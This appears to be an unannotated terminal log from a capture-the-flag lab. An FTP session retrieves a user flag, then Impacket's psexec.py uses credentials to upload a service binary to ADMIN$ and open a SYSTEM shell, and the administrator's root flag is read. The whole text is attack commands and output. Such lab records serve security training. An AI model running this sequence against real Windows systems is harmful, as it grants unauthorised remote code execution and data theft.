ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19 10:44PM <DIR> Administrator
11-04-19 03:25AM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19 07:05AM <DIR> Documents
07-16-16 08:18AM <DIR> Downloads
07-16-16 08:18AM <DIR> Music
07-16-16 08:18AM <DIR> Pictures
11-04-19 03:28AM 88 tester.txt
02-02-19 11:35PM 33 user.txt
07-16-16 08:18AM <DIR> Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.32 secs (0.0994 kB/s)$ cat user.txt
dd58ce67b49e15105×××
$ /opt/impacket/examples/psexec.py [email protected]Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file hOFlpyyw.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service jPEV on 10.10.10.152.....
[*] Starting service jPEV.....
[!] Press helpfor extra shell commands
Microsoft Windows [Version 10.0.14393](c)2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
c:\>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 684B-9CE8
Directory of C:\Users\Administrator\Desktop
02/02/2019 11:35 PM <DIR> .
02/02/2019 11:35 PM <DIR> ..
02/02/2019 11:35 PM 33 root.txt
1 File(s)33 bytes
2 Dir(s) 12,058,017,792 bytes free
C:\Users\Administrator\Desktop>type root.txt
3018977fb944bf1878f7××××××